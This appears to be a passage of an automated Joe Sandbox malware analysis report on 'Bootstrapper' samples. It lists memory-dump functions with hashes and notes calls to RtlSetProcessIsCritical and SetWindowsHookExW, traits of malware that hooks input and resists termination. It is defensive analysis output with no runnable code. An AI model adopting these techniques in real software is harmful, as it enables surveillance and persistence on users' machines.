                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67f8badbfd570b8df8eeaeb514cfc9365d3cef1a6c8e898481432290a77d63b4
                                                                                          • Instruction ID: e70ae9c10cbfd1b39e422610650033c475b16d51e4f14b78b8fd178c563a047b
                                                                                          • Opcode Fuzzy Hash: 67f8badbfd570b8df8eeaeb514cfc9365d3cef1a6c8e898481432290a77d63b4
                                                                                          • Instruction Fuzzy Hash: 3E524A30D0D6298EEBA5EB28C8957F9B3B1EF55340F5045BAD00EE7282CF396981CB54
                                                                                          Function 00007FF848C5C3BD Relevance: .6, Instructions: 576COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2dece9b5228829bfee05198ba2653b24d4ea29f8a3beeb1d222c1f735524f87d
                                                                                          • Instruction ID: a3de3b32de3a4e2b56223d4ab18998a90731ae4869e67d1f362d000a5329e43a
                                                                                          • Opcode Fuzzy Hash: 2dece9b5228829bfee05198ba2653b24d4ea29f8a3beeb1d222c1f735524f87d
                                                                                          • Instruction Fuzzy Hash: B3122D70D199298FEB99EB18C8947B8B7F1FF69351F0041B9D04EE3292DB34A981CB54
                                                                                          Function 00007FF848C5D738 Relevance: .5, Instructions: 518COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 70b91accdad5900b0061253c32583eb2ad4871317f089554aca32602ac50f833
                                                                                          • Instruction ID: 6b004aa763949e050c2629b52a60cb8d3bce8b8034fe3f1b95d083fd4a05d94d
                                                                                          • Opcode Fuzzy Hash: 70b91accdad5900b0061253c32583eb2ad4871317f089554aca32602ac50f833
                                                                                          • Instruction Fuzzy Hash: 63022770D199198FEB98EB28C894BA8B7F1FF59351F1001B9D04EE3295CB38A981CF55
                                                                                          Function 00007FF848C52CE9 Relevance: .4, Instructions: 418COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd44a1f8bf5d9a0045b9813f3e39d655730fdce71f3190eeab4b2552fd6e2449
                                                                                          • Instruction ID: d094f63d6df55b7126dfb296aef26228df7f912ab48c47fc513c48e10d430310
                                                                                          • Opcode Fuzzy Hash: cd44a1f8bf5d9a0045b9813f3e39d655730fdce71f3190eeab4b2552fd6e2449
                                                                                          • Instruction Fuzzy Hash: 2EE14C30D09A698FDB99EB2CD894BA8B7F0FF69351F5001AAD04DD3291CB34A981CB45
                                                                                          Function 00007FF848C5880E Relevance: .2, Instructions: 213COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a77d122a0de9a4c3142b6220faaaea765809a1d22cd80767ed24f90fe0f894b1
                                                                                          • Instruction ID: 9880ff5e1bd4950dfa1a8d222b855869122e1cc74b92b4c5bd7aee88b8ca0416
                                                                                          • Opcode Fuzzy Hash: a77d122a0de9a4c3142b6220faaaea765809a1d22cd80767ed24f90fe0f894b1
                                                                                          • Instruction Fuzzy Hash: 34819D70A18A1D8FDF98EF98C894BADB7B1FB69301F1044A9D00DE7291CB74A985DF44
                                                                                          Function 00007FF848C520FD Relevance: .2, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 059b6db52fc8ceda2843256748e60450a05c7f969533ef1a799dbe6889ec52a2
                                                                                          • Instruction ID: ba2ee7c12377fc7447b770924890524b54ca55de37f3c948ff3616ad2421528f
                                                                                          • Opcode Fuzzy Hash: 059b6db52fc8ceda2843256748e60450a05c7f969533ef1a799dbe6889ec52a2
                                                                                          • Instruction Fuzzy Hash: F751B570D1891D8FDF88EF68D895AACB7F1FF69345F101169E05AE7292CB34A881CB44
                                                                                          Function 00007FF848C5D750 Relevance: .1, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 63cd39df9ae906672a42b8b21b0f9b77def9f3462df34d6faad117b02a823480
                                                                                          • Instruction ID: b40c12a304d68278b4922a772bf6730654497fbccbe054cf74f7fd175cdd8411
                                                                                          • Opcode Fuzzy Hash: 63cd39df9ae906672a42b8b21b0f9b77def9f3462df34d6faad117b02a823480
                                                                                          • Instruction Fuzzy Hash: E8413770D1895D8EEB94EF68D889AADBBB1FF59341F10017AD40DE3296CB346881CB44
                                                                                          Function 00007FF848C41500 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 967c42db3be3ffb8dd96fedf9c3de98e6ff469fb382a69d1cc7932fe8fcc4ca8
                                                                                          • Instruction ID: c6acf5ad793fb7633db2d11ce587a9e946f8d233a56fca15e35e08ef898b6f28
                                                                                          • Opcode Fuzzy Hash: 967c42db3be3ffb8dd96fedf9c3de98e6ff469fb382a69d1cc7932fe8fcc4ca8
                                                                                          • Instruction Fuzzy Hash: 4C416531A0DA589FEB58EB6C98052F97BE1EFA5751F00423FE04EC3182CF64A842C795
                                                                                          Function 00007FF848C4302D Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 973 7ff848c4302d-7ff848c43110 RtlSetProcessIsCritical 977 7ff848c43118-7ff848c4314d 973->977 978 7ff848c43112 973->978 978->977
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 196fbc5ad924f883c0ab095d5544d8840b592305dfd02896a3adb75d53b994b5
                                                                                          • Instruction ID: bab8a77c303ac17739f8eb22608004461717bc7b799c8ec57939f827dbbd8f05
                                                                                          • Opcode Fuzzy Hash: 196fbc5ad924f883c0ab095d5544d8840b592305dfd02896a3adb75d53b994b5
                                                                                          • Instruction Fuzzy Hash: 3E41D63190C6588FD759DFA8D845AE97BF0FF56311F04416EE08AC3592CB746846CB91
                                                                                          Function 00007FF848C414D3 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 980 7ff848c414d3-7ff848c44b8d 988 7ff848c44c19-7ff848c44c1d 980->988 989 7ff848c44b93-7ff848c44b98 980->989 990 7ff848c44ba2-7ff848c44bdf SetWindowsHookExW 988->990 991 7ff848c44b9f-7ff848c44ba0 989->991 992 7ff848c44be1 990->992 993 7ff848c44be7-7ff848c44c18 990->993 991->990 992->993
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: f5f054f2ebf4cdabd4d1caf12ae41ace5a9030593ed8ca5e91852680517de857
                                                                                          • Instruction ID: 1f860902e16e8a1f504cb474e84abd030640ae8738c63e4749f04d008aa76e6f
                                                                                          • Opcode Fuzzy Hash: f5f054f2ebf4cdabd4d1caf12ae41ace5a9030593ed8ca5e91852680517de857
                                                                                          • Instruction Fuzzy Hash: 7C412430A1DE5C9FEB58EB6C98056B9BBE1FBA9711F00413ED04DC3192CB64A856C785
                                                                                          Function 00007FF848C44B08 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 996 7ff848c44b08-7ff848c44b0f 997 7ff848c44b1a-7ff848c44b8d 996->997 998 7ff848c44b11-7ff848c44b19 996->998 1002 7ff848c44c19-7ff848c44c1d 997->1002 1003 7ff848c44b93-7ff848c44b98 997->1003 998->997 1004 7ff848c44ba2-7ff848c44bdf SetWindowsHookExW 1002->1004 1005 7ff848c44b9f-7ff848c44ba0 1003->1005 1006 7ff848c44be1 1004->1006 1007 7ff848c44be7-7ff848c44c18 1004->1007 1005->1004 1006->1007
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 184e2037818de671df92895ea3401e577923a2a73f16fdf2a6a8726b12445ceb
                                                                                          • Instruction ID: b4cf78385feff7ed8abbaef3337b29af22dea139eaf679fc3c156e103c2ad2c0
                                                                                          • Opcode Fuzzy Hash: 184e2037818de671df92895ea3401e577923a2a73f16fdf2a6a8726b12445ceb
                                                                                          • Instruction Fuzzy Hash: 2E312C30A0CA4C9FDB58EB6C98466F97BE1EB55321F10423ED009C3292CF74A856C7C1
                                                                                          Function 00007FF848C414E0 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1010 7ff848c414e0-7ff848c44b8d 1016 7ff848c44c19-7ff848c44c1d 1010->1016 1017 7ff848c44b93-7ff848c44b98 1010->1017 1018 7ff848c44ba2-7ff848c44bdf SetWindowsHookExW 1016->1018 1019 7ff848c44b9f-7ff848c44ba0 1017->1019 1020 7ff848c44be1 1018->1020 1021 7ff848c44be7-7ff848c44c18 1018->1021 1019->1018 1020->1021
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 286a2dc8b0d2252d88b3a34110af88e9fb3248374f0ca8ff8111e1ca1a75af0b
                                                                                          • Instruction ID: 0e1cbbd344f0807b62bc001a345e8d7ce43bf3125cb459f3afa3a31d924679c3
                                                                                          • Opcode Fuzzy Hash: 286a2dc8b0d2252d88b3a34110af88e9fb3248374f0ca8ff8111e1ca1a75af0b
                                                                                          • Instruction Fuzzy Hash: 87311530A1DE5C9FEB58EF5C98056B9BBE1EB99711F10413ED04EC3292CB64A852CB85
                                                                                          Function 00007FF848C41440 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1024 7ff848c41440-7ff848c430aa 1028 7ff848c430b2-7ff848c43110 RtlSetProcessIsCritical 1024->1028 1029 7ff848c43118-7ff848c4314d 1028->1029 1030 7ff848c43112 1028->1030 1030->1029
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 432aaf7d0b2cd7c00169c0384b026b1bfdd6b41a5dfc3c9cac208bffbffb0b64
                                                                                          • Instruction ID: 3a5cca2df75d46b33b3a10330552a8d9b105848a7fc4845d475a63be0b547113
                                                                                          • Opcode Fuzzy Hash: 432aaf7d0b2cd7c00169c0384b026b1bfdd6b41a5dfc3c9cac208bffbffb0b64
                                                                                          • Instruction Fuzzy Hash: B831F33090CA588FDB29EBACD845AF97BF0FF55311F04412ED08AD3692CB346842CB91

                                                                                          Non-executed Functions

                                                                                          Function 00007FF848C5C206 Relevance: .2, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1c9835d69ee239a032778f94d0dbb7bd366064d7eb6b5c18a7bfbf67a4dd3d9d
                                                                                          • Instruction ID: 469bef09e27efdb71481ff5b4ecc61553a49d438107030e414849dbcfa5401e8
                                                                                          • Opcode Fuzzy Hash: 1c9835d69ee239a032778f94d0dbb7bd366064d7eb6b5c18a7bfbf67a4dd3d9d
                                                                                          • Instruction Fuzzy Hash: 1A510570C4D69E9FDB86DBA48865AF9BBF0EF5A300F0801BED049D7192CB2C5846C751
                                                                                          Function 00007FF848C5D621 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e027d3b56ddc30f35fc4c584685d3ca657e484f5d9c565e34c7ded1b05eb41a5
                                                                                          • Instruction ID: 78dd6014d916dfce6ea6ef7e646cfe6d78bb0c4cbee69d4aba04bf9109e60c8a
                                                                                          • Opcode Fuzzy Hash: e027d3b56ddc30f35fc4c584685d3ca657e484f5d9c565e34c7ded1b05eb41a5
                                                                                          • Instruction Fuzzy Hash: EA215B71D0D6598FEB88EF1494952BDBBB1FF15340F1404BEE40D97191CB389551CB44

                                                                                          Executed Functions

                                                                                          Function 00007FF848C45D53 Relevance: 1.0, Instructions: 956COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48aa274949e887aa05cec3bfbc6021da09c88f2bd9b1a0677ad52ea6f08e19e8
                                                                                          • Instruction ID: 92460ea707b14af5b6065af4c93bcf8aefb16e078fac26ad3e3d7feac2c0106c
                                                                                          • Opcode Fuzzy Hash: 48aa274949e887aa05cec3bfbc6021da09c88f2bd9b1a0677ad52ea6f08e19e8
                                                                                          • Instruction Fuzzy Hash: F8526A30A0CA894FE795FB388855AB97BE1FF55740F0441BED04AC72D7DF28A8468785
                                                                                          Function 00007FF848C37470 Relevance: .4, Instructions: 427COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d25f2e39c3ada406237f055945d005dac833681e3b7c89914d6cb9165f0f191e
                                                                                          • Instruction ID: fa30795fa0f4258e18ece3ecf3cd235aa7210175b2fbd5bd9cea34017126d0f2
                                                                                          • Opcode Fuzzy Hash: d25f2e39c3ada406237f055945d005dac833681e3b7c89914d6cb9165f0f191e
                                                                                          • Instruction Fuzzy Hash: CBD19431A0DA8E8FDBD5EF2C8455AA93BE1FF69351F0401BBE449C7292CB24D846C745
                                                                                          Function 00007FF848C46CD0 Relevance: 2.0, Strings: 1, Instructions: 786COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \
                                                                                          • API String ID: 0-2967466578
                                                                                          • Opcode ID: 085ad26a8d6105db78fc76c4c970fc9612acfaf00706b17ba51d212e978666db
                                                                                          • Instruction ID: 1fcb9bb274e1148ef39b9061047b58f1a8d8b16203f10ca90bdf46b7d5a120b2
                                                                                          • Opcode Fuzzy Hash: 085ad26a8d6105db78fc76c4c970fc9612acfaf00706b17ba51d212e978666db
                                                                                          • Instruction Fuzzy Hash: 89324730A1CA458FE399EB2884556B577D1FF85B80F14807ED48FC7197CF28B8868B96
                                                                                          Function 00007FF848C35A70 Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ;M_^2
                                                                                          • API String ID: 0-3580439828
                                                                                          • Opcode ID: 1b6397751e5061df2660c40ba20c75e977aaa970b0f3772b907b6c0272ba109f
                                                                                          • Instruction ID: cac2b8c715f5a77a8aa9029fa55a919e8fa666896b803b95cdffb1583bf668dd
                                                                                          • Opcode Fuzzy Hash: 1b6397751e5061df2660c40ba20c75e977aaa970b0f3772b907b6c0272ba109f
                                                                                          • Instruction Fuzzy Hash: BCF1BB71A1CB498FE798EB2884556BAB7E2FF98340F00457ED48DC3296DF34A8429746
                                                                                          Function 00007FF848C4A98C Relevance: 1.7, Strings: 1, Instructions: 464COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: 27197214c814056b9093b2efddb4c3734697ca03ec869fe4553c4ce3fee0fcbd
                                                                                          • Instruction ID: c4450b87c58466db7f2d8cbb8a0759ff4604a881c836d3777a86aed207d90552
                                                                                          • Opcode Fuzzy Hash: 27197214c814056b9093b2efddb4c3734697ca03ec869fe4553c4ce3fee0fcbd
                                                                                          • Instruction Fuzzy Hash: 80E1E130A1CA4A8FE7A9EB188444675B7E1FF98740F1445BDD04EC3296DF35E8C28B45
                                                                                          Function 00007FF848C3A33A Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: ec0ac95b06dad119024f272b403fcc0370700fa966dd80d637434a3b7b81920f
                                                                                          • Instruction ID: 772b5f9c05a88dedcfc73a8a8ff658298ad5a3bc39de7167c7921e1fec63b800
                                                                                          • Opcode Fuzzy Hash: ec0ac95b06dad119024f272b403fcc0370700fa966dd80d637434a3b7b81920f
                                                                                          • Instruction Fuzzy Hash: 59C1F030A0CF4A4FD7A9EB188484575B7E1FFA5380F1445BED08AC7296DB29F8938785
                                                                                          Function 00007FF848C38A60 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: 10a273e972a63d2e4137bff9934addb9d5815397ee55cde14ccaafc8b464d756
                                                                                          • Instruction ID: ee82956670ce82e821970363fadbe771f65bcd495c85da492318e39a5585c1d7
                                                                                          • Opcode Fuzzy Hash: 10a273e972a63d2e4137bff9934addb9d5815397ee55cde14ccaafc8b464d756
                                                                                          • Instruction Fuzzy Hash: 90C1CC30A1CF458FD7A8EB189485536B3E1FF99340F14497ED08A83696DA35F8938B85
                                                                                          Function 00007FF848C40258 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: I
                                                                                          • API String ID: 0-3707901625
                                                                                          • Opcode ID: d5f583e85121b64a0290cb85be7c0170437804b2c5c86ba7ced89ed9359b3a18
                                                                                          • Instruction ID: a1649ccf92d9fa71c837fd37f4786f77e35aa746839819f29aa4bf006e6e6eb8
                                                                                          • Opcode Fuzzy Hash: d5f583e85121b64a0290cb85be7c0170437804b2c5c86ba7ced89ed9359b3a18
                                                                                          • Instruction Fuzzy Hash: 42C13531E0E98A9FD7C5FB6CA8552E97BE0FF46750F0401BAD048C719BDA2898458345
                                                                                          Function 00007FF848C36367 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H
                                                                                          • API String ID: 0-2852464175
                                                                                          • Opcode ID: 8adbab788b9b568d0624731b4e43ba3c34aeb1e164c70f8c599c08fb32692aa8
                                                                                          • Instruction ID: 40e0e467d3d5211006c658f560c6dd10f7a4f9bc7ca9a157e248130d40765fc5
                                                                                          • Opcode Fuzzy Hash: 8adbab788b9b568d0624731b4e43ba3c34aeb1e164c70f8c599c08fb32692aa8
                                                                                          • Instruction Fuzzy Hash: 74210561E0D98A9FE7D6E7285444AB97BD0FF95380F5401BBD04AC3182DF28A817A745
                                                                                          Function 00007FF848C36396 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H
                                                                                          • API String ID: 0-2852464175
                                                                                          • Opcode ID: 7a2ace14309925638ed832720de8db5bc42dcb0cffbb967058e6c3859e1f9b43
                                                                                          • Instruction ID: 4d598d7956f5ff8bcba527da099158c37d2762420c23c320b3b8fea6eb09ce1b
                                                                                          • Opcode Fuzzy Hash: 7a2ace14309925638ed832720de8db5bc42dcb0cffbb967058e6c3859e1f9b43
                                                                                          • Instruction Fuzzy Hash: 31115261D0CAC29FE3D6EA2848489B23BA0EFA6340F0800ABD049C3093EF286C47D355
                                                                                          Function 00007FF848C36AA8 Relevance: .6, Instructions: 596COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 512224e1a640c76c38c3d1e5793ebf359b0c917f2b1d85ffdc1801e12ba3dc6b
                                                                                          • Instruction ID: b9f7e3c524140c3034595e32b78f0ba1a3c7255c51970e68d9f6942b61ac9f3b
                                                                                          • Opcode Fuzzy Hash: 512224e1a640c76c38c3d1e5793ebf359b0c917f2b1d85ffdc1801e12ba3dc6b
                                                                                          • Instruction Fuzzy Hash: F812D630A0CA498FDB99EB2CD454AB97BE1FF99300F14416ED48EC7296CF24E846D785
                                                                                          Function 00007FF848C373A8 Relevance: .5, Instructions: 479COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2141659597.00007FF848C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848c30000_Bootstrapper.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
